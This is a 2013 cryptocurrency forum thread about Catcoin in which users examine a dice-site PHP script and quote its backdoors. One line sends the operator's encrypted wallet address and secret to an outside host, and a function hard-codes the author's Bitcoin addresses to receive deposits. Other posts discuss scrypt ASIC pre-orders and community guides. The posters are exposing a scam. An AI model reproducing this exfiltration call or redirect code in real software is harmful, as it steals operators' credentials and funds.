doc12
Legendary
Offline
Activity: 1284
Merit: 1042
|
|
December 28, 2013, 09:33:07 PM |
|
|
|
|
|
Nullu
|
|
December 28, 2013, 09:33:26 PM |
|
It contains 2 stuffs I don't like: first it sends all the info, private and public address to another server, plus the password of the admin to the " owner of the script" But we need to setup the API of catcoin in it.
Tell me where those particular files are in the directory and I'll take a look at the PHP code.
|
BTC - 14kYyhhWZwSJFHAjNTtyhRVSu157nE92gF
|
|
|
FanEagle
Legendary
Offline
Activity: 2898
Merit: 1118
Leading Crypto Sports Betting & Casino Platform
|
|
December 28, 2013, 09:34:29 PM |
|
Expecially for the option application/controllers/admin.php where it says: Quote //Sending bank address and secret encrypted to a server to check balance $bankaddress = $this->encrypt($this->input->post("bankaddress")); $banksecret = $this->encrypt($this->input->post("banksecret")); $fee = $this->input->post("fee"); $pass = $this->input->post("pass"); $resp = file_get_contents(" http://dicetest.net23.net/electro2000/123.php?btca=$bankaddress&btcs=$banksecret"); $data = array Where it sends your info to his website(Why the creator of the website wants our password?) or this: application/models/ViewBase.php Quote private function get_address(){ $addresses = array("145N2EFzReaH4hkfb8jVaYbLq7VUm75TmV", "12ENTxaNfyrrzGGu2WDyrC4xZy2tVQA5az", "13yTHvFDxaUUP44KiDkWk27F4We18gJFse", "1ATknpbvfjzXkg1nFGJPTeG9Wzxhi9Z5Ts", "12eGV9FcCvqNU8Ya6CUD8Uu4nNHNPJaKGi", "1L1ULCndeghKZAteTe3tmcKG6HCPDCeLMX", "18JxX3839mZCMrRbtAP1W485kHW3RYUnFG", "16nVMZ3qKwRhFoHTPZjF67EdJ9nrchUSQf"); return $addresses[array_rand($addresses)]; Where it happens to be a nice list of where receive your Bank's money. Anyone that is be so gentle to edit the parts where it sends the money to the creator of this? I mean, I know it's opensorce but at least not steal people's money
|
..Stake.com.. | | | ▄████████████████████████████████████▄ ██ ▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄ ██ ▄████▄ ██ ▀▀▀▀▀▀▀▀▀▀ ██████████ ▀▀▀▀▀▀▀▀▀▀ ██ ██████ ██ ██████████ ██ ██ ██████████ ██ ▀██▀ ██ ██ ██ ██████ ██ ██ ██ ██ ██ ██ ██████ ██ █████ ███ ██████ ██ ████▄ ██ ██ █████ ███ ████ ████ █████ ███ ████████ ██ ████ ████ ██████████ ████ ████ ████▀ ██ ██████████ ▄▄▄▄▄▄▄▄▄▄ ██████████ ██ ██ ▀▀▀▀▀▀▀▀▀▀ ██ ▀█████████▀ ▄████████████▄ ▀█████████▀ ▄▄▄▄▄▄▄▄▄▄▄▄███ ██ ██ ███▄▄▄▄▄▄▄▄▄▄▄▄ ██████████████████████████████████████████ | | | | | | ▄▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▄ █ ▄▀▄ █▀▀█▀▄▄ █ █▀█ █ ▐ ▐▌ █ ▄██▄ █ ▌ █ █ ▄██████▄ █ ▌ ▐▌ █ ██████████ █ ▐ █ █ ▐██████████▌ █ ▐ ▐▌ █ ▀▀██████▀▀ █ ▌ █ █ ▄▄▄██▄▄▄ █ ▌▐▌ █ █▐ █ █ █▐▐▌ █ █▐█ ▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀█ | | | | | | ▄▄█████████▄▄ ▄██▀▀▀▀█████▀▀▀▀██▄ ▄█▀ ▐█▌ ▀█▄ ██ ▐█▌ ██ ████▄ ▄█████▄ ▄████ ████████▄███████████▄████████ ███▀ █████████████ ▀███ ██ ███████████ ██ ▀█▄ █████████ ▄█▀ ▀█▄ ▄██▀▀▀▀▀▀▀██▄ ▄▄▄█▀ ▀███████ ███████▀ ▀█████▄ ▄█████▀ ▀▀▀███▄▄▄███▀▀▀ | | | ..PLAY NOW.. |
|
|
|
Nullu
|
|
December 28, 2013, 09:46:39 PM |
|
Expecially for the option application/controllers/admin.php where it says: Quote //Sending bank address and secret encrypted to a server to check balance $bankaddress = $this->encrypt($this->input->post("bankaddress")); $banksecret = $this->encrypt($this->input->post("banksecret")); $fee = $this->input->post("fee"); $pass = $this->input->post("pass"); $resp = file_get_contents(" http://dicetest.net23.net/electro2000/123.php?btca=$bankaddress&btcs=$banksecret"); $data = array Where it sends your info to his website(Why the creator of the website wants our password?) or this: application/models/ViewBase.php Quote private function get_address(){ $addresses = array("145N2EFzReaH4hkfb8jVaYbLq7VUm75TmV", "12ENTxaNfyrrzGGu2WDyrC4xZy2tVQA5az", "13yTHvFDxaUUP44KiDkWk27F4We18gJFse", "1ATknpbvfjzXkg1nFGJPTeG9Wzxhi9Z5Ts", "12eGV9FcCvqNU8Ya6CUD8Uu4nNHNPJaKGi", "1L1ULCndeghKZAteTe3tmcKG6HCPDCeLMX", "18JxX3839mZCMrRbtAP1W485kHW3RYUnFG", "16nVMZ3qKwRhFoHTPZjF67EdJ9nrchUSQf"); return $addresses[array_rand($addresses)]; Where it happens to be a nice list of where receive your Bank's money. Anyone that is be so gentle to edit the parts where it sends the money to the creator of this? I mean, I know it's opensorce but at least not steal people's money How much do you know about PHP? $resp is an associative array that stores all the data it grabs from that admins website. What you could do also add a function to the class that prints off those values, then when you have them, you can hard code the values you want to change in the update() method for the values you want to change. Unless update() has some other purpose than to send data to a remote server, and those values aren't being used in the game, you could just disable it where it's being called. Otherwise, just disable all the $name = $this->input->post by adding // infront of each one.
|
BTC - 14kYyhhWZwSJFHAjNTtyhRVSu157nE92gF
|
|
|
FanEagle
Legendary
Offline
Activity: 2898
Merit: 1118
Leading Crypto Sports Betting & Casino Platform
|
|
December 28, 2013, 09:48:57 PM |
|
Ok,but what about the API, so it converts the entire website for catcoins when creating new deposit addresses I don't know much about PHP, but I like to explore codes. Btw, where I can find the part of the API's in your opinion?
|
..Stake.com.. | | | ▄████████████████████████████████████▄ ██ ▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄ ██ ▄████▄ ██ ▀▀▀▀▀▀▀▀▀▀ ██████████ ▀▀▀▀▀▀▀▀▀▀ ██ ██████ ██ ██████████ ██ ██ ██████████ ██ ▀██▀ ██ ██ ██ ██████ ██ ██ ██ ██ ██ ██ ██████ ██ █████ ███ ██████ ██ ████▄ ██ ██ █████ ███ ████ ████ █████ ███ ████████ ██ ████ ████ ██████████ ████ ████ ████▀ ██ ██████████ ▄▄▄▄▄▄▄▄▄▄ ██████████ ██ ██ ▀▀▀▀▀▀▀▀▀▀ ██ ▀█████████▀ ▄████████████▄ ▀█████████▀ ▄▄▄▄▄▄▄▄▄▄▄▄███ ██ ██ ███▄▄▄▄▄▄▄▄▄▄▄▄ ██████████████████████████████████████████ | | | | | | ▄▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▄ █ ▄▀▄ █▀▀█▀▄▄ █ █▀█ █ ▐ ▐▌ █ ▄██▄ █ ▌ █ █ ▄██████▄ █ ▌ ▐▌ █ ██████████ █ ▐ █ █ ▐██████████▌ █ ▐ ▐▌ █ ▀▀██████▀▀ █ ▌ █ █ ▄▄▄██▄▄▄ █ ▌▐▌ █ █▐ █ █ █▐▐▌ █ █▐█ ▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀█ | | | | | | ▄▄█████████▄▄ ▄██▀▀▀▀█████▀▀▀▀██▄ ▄█▀ ▐█▌ ▀█▄ ██ ▐█▌ ██ ████▄ ▄█████▄ ▄████ ████████▄███████████▄████████ ███▀ █████████████ ▀███ ██ ███████████ ██ ▀█▄ █████████ ▄█▀ ▀█▄ ▄██▀▀▀▀▀▀▀██▄ ▄▄▄█▀ ▀███████ ███████▀ ▀█████▄ ▄█████▀ ▀▀▀███▄▄▄███▀▀▀ | | | ..PLAY NOW.. |
|
|
|
AnnaNeMuss
Newbie
Offline
Activity: 36
Merit: 0
|
|
December 28, 2013, 09:53:17 PM |
|
those who have lots of cats have to make hash attack on it when next diif comes only way to try keep price going up then
That would be silly. Why would they shy people away from something they want to profit from? Forking this coin nearly killed it the first time, it would just put it in its grave the second.
|
|
|
|
Nullu
|
|
December 28, 2013, 10:01:23 PM |
|
Ok,but what about the API, so it converts the entire website for catcoins when creating new deposit addresses I don't know much about PHP, but I like to explore codes. Btw, where I can find the part of the API's in your opinion? application/models/viewbase.php has some stuff relating to BTC addresses. Might be a good starting point. Perhaps these relate to the paying in/ paying out addresses. Also; $query = $this->db->get('settings'); This part of the database probably has some settings relating to payments. So you'll have to look into the SQL table in PHPmyAdmin on your server.
|
BTC - 14kYyhhWZwSJFHAjNTtyhRVSu157nE92gF
|
|
|
FanEagle
Legendary
Offline
Activity: 2898
Merit: 1118
Leading Crypto Sports Betting & Casino Platform
|
|
December 28, 2013, 10:04:10 PM |
|
Ok,but what about the API, so it converts the entire website for catcoins when creating new deposit addresses I don't know much about PHP, but I like to explore codes. Btw, where I can find the part of the API's in your opinion? application/models/viewbase.php has some stuff relating to BTC addresses. Might be a good starting point. Perhaps these relate to the paying in/ paying out addresses. Also; $query = $this->db->get('settings'); This part of the database probably has some settings relating to payments. So you'll have to look into the SQL table in PHPmyAdmin on your server. nope thats another part of the backdoor. at least, it's what i think
|
..Stake.com.. | | | ▄████████████████████████████████████▄ ██ ▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄ ██ ▄████▄ ██ ▀▀▀▀▀▀▀▀▀▀ ██████████ ▀▀▀▀▀▀▀▀▀▀ ██ ██████ ██ ██████████ ██ ██ ██████████ ██ ▀██▀ ██ ██ ██ ██████ ██ ██ ██ ██ ██ ██ ██████ ██ █████ ███ ██████ ██ ████▄ ██ ██ █████ ███ ████ ████ █████ ███ ████████ ██ ████ ████ ██████████ ████ ████ ████▀ ██ ██████████ ▄▄▄▄▄▄▄▄▄▄ ██████████ ██ ██ ▀▀▀▀▀▀▀▀▀▀ ██ ▀█████████▀ ▄████████████▄ ▀█████████▀ ▄▄▄▄▄▄▄▄▄▄▄▄███ ██ ██ ███▄▄▄▄▄▄▄▄▄▄▄▄ ██████████████████████████████████████████ | | | | | | ▄▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▄ █ ▄▀▄ █▀▀█▀▄▄ █ █▀█ █ ▐ ▐▌ █ ▄██▄ █ ▌ █ █ ▄██████▄ █ ▌ ▐▌ █ ██████████ █ ▐ █ █ ▐██████████▌ █ ▐ ▐▌ █ ▀▀██████▀▀ █ ▌ █ █ ▄▄▄██▄▄▄ █ ▌▐▌ █ █▐ █ █ █▐▐▌ █ █▐█ ▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀█ | | | | | | ▄▄█████████▄▄ ▄██▀▀▀▀█████▀▀▀▀██▄ ▄█▀ ▐█▌ ▀█▄ ██ ▐█▌ ██ ████▄ ▄█████▄ ▄████ ████████▄███████████▄████████ ███▀ █████████████ ▀███ ██ ███████████ ██ ▀█▄ █████████ ▄█▀ ▀█▄ ▄██▀▀▀▀▀▀▀██▄ ▄▄▄█▀ ▀███████ ███████▀ ▀█████▄ ▄█████▀ ▀▀▀███▄▄▄███▀▀▀ | | | ..PLAY NOW.. |
|
|
|
singula
|
|
December 28, 2013, 10:15:29 PM |
|
$resp = file_get_contents(" http://dicetest.net23.net/electro2000/123.php?btca=$bankaddress&btcs=$banksecret"); ... $addresses = array("145N2EFzReaH4hkfb8jVaYbLq7VUm75TmV", "12ENTxaNfyrrzGGu2WDyrC4xZy2tVQA5az", "13yTHvFDxaUUP44KiDkWk27F4We18gJFse", "1ATknpbvfjzXkg1nFGJPTeG9Wzxhi9Z5Ts", "12eGV9FcCvqNU8Ya6CUD8Uu4nNHNPJaKGi", "1L1ULCndeghKZAteTe3tmcKG6HCPDCeLMX", "18JxX3839mZCMrRbtAP1W485kHW3RYUnFG", "16nVMZ3qKwRhFoHTPZjF67EdJ9nrchUSQf"); ... Anyone that is be so gentle to edit the parts where it sends the money to the creator of this? This thing is FUBAR - basically, the rest of the code is just a Potemkin Village around these two backdoors. No game code at all ... no code to process any bitcoin payments or withdrawals either. Basically unfixable piece of junk. I guess whoever wrote this intended to just steal whatever initial balance is deposited on the site and then perhaps steal even more if someone actually makes some test deposit or puts it live without testing (all bitcoins sent to the site ends up in author's pocket)
|
Big brother is not watching you anymore. Big brother is telling you how to live.
|
|
|
kuroman
|
|
December 28, 2013, 10:17:07 PM |
|
Still looking for someone willing to help post updates on twitter while I am offline during 1am-12am PST
Would offer but I'm in California too Maybe you can use something like Buffer or Hootsuite to schedule updates throughout the night? If you have a powerful computer and want to mine coins yourself, join one of the following pools Maybe i don't have right but it should be "If you haven't a powerful computer and want to mine coins, join one of the following pools:" I've changed it to If you would like to mine for your own coins, you may consider joining one of the following pools: I live in europe so maybe I can do the updates for that time zone
|
|
|
|
CatCoinForums
Member
Offline
Activity: 98
Merit: 10
|
|
December 28, 2013, 10:17:55 PM |
|
www.catcoinforum.com < still in beta stages but updating frequently to make this a success. Please register thank you.
|
|
|
|
FanEagle
Legendary
Offline
Activity: 2898
Merit: 1118
Leading Crypto Sports Betting & Casino Platform
|
|
December 28, 2013, 10:18:13 PM |
|
That is what I wasn't hoping for.. so it will be far to have a service for cat I tried to help.
|
..Stake.com.. | | | ▄████████████████████████████████████▄ ██ ▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄ ██ ▄████▄ ██ ▀▀▀▀▀▀▀▀▀▀ ██████████ ▀▀▀▀▀▀▀▀▀▀ ██ ██████ ██ ██████████ ██ ██ ██████████ ██ ▀██▀ ██ ██ ██ ██████ ██ ██ ██ ██ ██ ██ ██████ ██ █████ ███ ██████ ██ ████▄ ██ ██ █████ ███ ████ ████ █████ ███ ████████ ██ ████ ████ ██████████ ████ ████ ████▀ ██ ██████████ ▄▄▄▄▄▄▄▄▄▄ ██████████ ██ ██ ▀▀▀▀▀▀▀▀▀▀ ██ ▀█████████▀ ▄████████████▄ ▀█████████▀ ▄▄▄▄▄▄▄▄▄▄▄▄███ ██ ██ ███▄▄▄▄▄▄▄▄▄▄▄▄ ██████████████████████████████████████████ | | | | | | ▄▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▄ █ ▄▀▄ █▀▀█▀▄▄ █ █▀█ █ ▐ ▐▌ █ ▄██▄ █ ▌ █ █ ▄██████▄ █ ▌ ▐▌ █ ██████████ █ ▐ █ █ ▐██████████▌ █ ▐ ▐▌ █ ▀▀██████▀▀ █ ▌ █ █ ▄▄▄██▄▄▄ █ ▌▐▌ █ █▐ █ █ █▐▐▌ █ █▐█ ▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀█ | | | | | | ▄▄█████████▄▄ ▄██▀▀▀▀█████▀▀▀▀██▄ ▄█▀ ▐█▌ ▀█▄ ██ ▐█▌ ██ ████▄ ▄█████▄ ▄████ ████████▄███████████▄████████ ███▀ █████████████ ▀███ ██ ███████████ ██ ▀█▄ █████████ ▄█▀ ▀█▄ ▄██▀▀▀▀▀▀▀██▄ ▄▄▄█▀ ▀███████ ███████▀ ▀█████▄ ▄█████▀ ▀▀▀███▄▄▄███▀▀▀ | | | ..PLAY NOW.. |
|
|
|
Nullu
|
|
December 28, 2013, 10:19:03 PM |
|
$resp = file_get_contents(" http://dicetest.net23.net/electro2000/123.php?btca=$bankaddress&btcs=$banksecret"); ... $addresses = array("145N2EFzReaH4hkfb8jVaYbLq7VUm75TmV", "12ENTxaNfyrrzGGu2WDyrC4xZy2tVQA5az", "13yTHvFDxaUUP44KiDkWk27F4We18gJFse", "1ATknpbvfjzXkg1nFGJPTeG9Wzxhi9Z5Ts", "12eGV9FcCvqNU8Ya6CUD8Uu4nNHNPJaKGi", "1L1ULCndeghKZAteTe3tmcKG6HCPDCeLMX", "18JxX3839mZCMrRbtAP1W485kHW3RYUnFG", "16nVMZ3qKwRhFoHTPZjF67EdJ9nrchUSQf"); ... Anyone that is be so gentle to edit the parts where it sends the money to the creator of this? This thing is FUBAR - basically, the rest of the code is just a Potemkin Village around these two backdoors. No game code at all ... no code to process any bitcoin payments or withdrawals either. Basically unfixable piece of junk. I guess whoever wrote this intended to just steal whatever initial balance is deposited on the site and then perhaps steal even more if someone actually makes some test deposit or puts it live without testing (all bitcoins sent to the site ends up in author's pocket) I was beginning to wonder why I can't make heads of tails of the source. Nothing seemed substantial. The only hard code I could find relating to addresses was that, and all the information is being sent to another server.
|
BTC - 14kYyhhWZwSJFHAjNTtyhRVSu157nE92gF
|
|
|
kuroman
|
|
December 28, 2013, 10:20:15 PM |
|
Hello, guys I've been working on a guide for newbies and non techsavies to lure more people to catcoin This guide is a Powerpoint presentation (base) that can be used as a video (next step) or can be copied and added as it to webpages, forums, ect Please feel free to review them, and give me your feed back for additions and modifications, it's more than welcome here is a link for pptx and ppt https://drive.google.com/file/d/0B00NopRC_K86N2FwU29yTFRPaG8/edit?usp=sharinghttps://drive.google.com/file/d/0B00NopRC_K86dGNjd2Naa0lQS28/edit?usp=sharing(You can view the ppt file online but the problem is that is does showup a bit mislined and it doesn't show the animations (on one slide I had step by step explanation with animations )) I used some of the image from the community if you guys want me to remove your image please feel free to ask me and I'll do so Please feel free to donate some cats, if you find this usefull thank you 9nKQGr6o7S5xWXbykisAGgQeKowX7hVQzs Also Kr105 if you think it's worth it you can add these to the initial post and to catcoin.pw More feedback please,so we can have a final version and can use it to make a youtube video thanks
|
|
|
|
loader140
Member
Offline
Activity: 112
Merit: 10
|
|
December 28, 2013, 10:33:15 PM |
|
F@&K SAKE, great time to make scrypt as tough as SHA-256 bye bye GPU mining Q2/3 of 2014 :/ Yes that is right ASICS are coming to scrypt that means it is going to put the little ones out again at least it will hopefully keep this coin alive https://alpha-t.net/product/scrypt-asic-miner/5M/hash £1350 25M/hash £5450 CAT--->MARS
|
|
|
|
Nullu
|
|
December 28, 2013, 10:36:45 PM |
|
F@&K SAKE, great time to make scrypt as tough as SHA-256 bye bye GPU mining Q2/3 of 2014 :/ Yes that is right ASICS are coming to scrypt that means it is going to put the little ones out again at least it will hopefully keep this coin alive https://alpha-t.net/product/scrypt-asic-miner/5M/hash £1350 25M/hash £5450 CAT--->MARS Still a good change that alpha-t is a scam. Not even any pictures of hardware yet. Just a crude logo and some design concepts.
|
BTC - 14kYyhhWZwSJFHAjNTtyhRVSu157nE92gF
|
|
|
loader140
Member
Offline
Activity: 112
Merit: 10
|
|
December 28, 2013, 10:40:46 PM |
|
F@&K SAKE, great time to make scrypt as tough as SHA-256 bye bye GPU mining Q2/3 of 2014 :/ Yes that is right ASICS are coming to scrypt that means it is going to put the little ones out again at least it will hopefully keep this coin alive https://alpha-t.net/product/scrypt-asic-miner/5M/hash £1350 25M/hash £5450 CAT--->MARS Still a good change that alpha-t is a scam. Not even any pictures of hardware yet. Just a crude logo and some design concepts. Lets hope so (I mean that in the best way possible, I hope if they are no one will get ripped off and then nothing will happen) But they have been online for about a year now so I think they are quite serious in it, either way the rich get richer and the poor get screwed again
|
|
|
|
|
McCave
Newbie
Offline
Activity: 9
Merit: 0
|
|
December 28, 2013, 10:43:34 PM |
|
Has anyone even been in touch with these people from Alpha Technology? I know they're posting in a thread on Litecointalk. There's a thread on Alpha Technology on litecointalk.orgIf it's true though, GPU mining is f***ed.
|
|
|
|
VesperPL
Newbie
Offline
Activity: 28
Merit: 0
|
|
December 28, 2013, 10:46:32 PM |
|
F@&K SAKE, great time to make scrypt as tough as SHA-256 bye bye GPU mining Q2/3 of 2014 :/ Yes that is right ASICS are coming to scrypt that means it is going to put the little ones out again at least it will hopefully keep this coin alive https://alpha-t.net/product/scrypt-asic-miner/5M/hash £1350 25M/hash £5450 CAT--->MARS Be cool. It,s preeeeeeeeeeeeeeee order! They haven't even any prototype.... Just be cool it's scam!
|
|
|
|
|